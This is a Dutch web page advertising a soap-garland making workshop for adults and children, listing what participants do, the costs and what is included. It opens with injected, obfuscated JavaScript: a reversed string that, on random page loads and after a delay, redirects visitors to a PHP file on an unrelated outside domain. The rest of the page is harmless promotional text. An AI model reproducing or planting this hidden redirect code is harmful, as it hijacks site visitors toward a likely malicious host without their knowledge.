)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top=”40px” padding_bottom=”10px” bg_video=”” class=”” style=””]

Zeepslinger maken

Zoekt u een unieke en gezellige workshop? Voor bijvoorbeeld een gezellig uitje met uw vriendinnen of een kinderverjaardag (vanaf zeven jaar)?

Dan is de workshop ‘Zeepslinger maken’ echt een originele en leuke doe-activiteit.

Heerlijk samen bezig zijn

In mijn praktijk of bij u thuis gaan we drie uur lang lekker samen aan de slag om Zeepslinger makeneen heerlijk geurende zeepslinger te maken. Na mijn uitleg over de verschillende soorten zeep, kleurpigmenten en mica (glasachtig mineraal met metaalglans), gaan we aan de slag met het mengen van aromatische oliën, parfumoliën, kleuren en mica (voor de glans).

Vervolgens gaan we de eigen gemaakte zeep gieten in een mal. Ik heb in mijn praktijk wel tweehonderd mallen om uit te kiezen.
Terwijl de zeep aan het drogen is, gaan we kralen, schelpen en een lint kiezen die nodig zijn om de slinger te maken.

Heeft u ervaring met zeepslingers maken dan is er een workshop die u leert zeep in laagjes te gieten met of zonder kleurlagen. Ook kan er gebruik gemaak worden van speciale mallen om het effect te versterken. We gaan aan de slag met het rijgen op ijzerdraad en 3D mallen.

Voor kinderen is het proces van mengen en gieten een leuke bezigheid waar ze samen veel plezier aan beleven. Een keer wat anders dan het doorsnee kinderfeestje.

Kosten en inhoud van de workshop

Zeepslinger blauw

De kosten van deze workshop of een privé cursus zijn op aanvraag.
U kunt zowel pinnen als contant afrekenen.

Wat inbegrepen is:

  • Drie uur lang heerlijk creëren
  • Een mooie en overzichtelijke kleine reader
  • Een zeepslinger voor thuis (ook leuk om cadeau te geven)
    Tip: voor Moederdag of Kerst!
  • Koffie, thee (Ranja voor de kinderen)

Kijk in mijn agenda of reserveer zelf en een plek voor deze workshop ‘Zeepslinger maken’.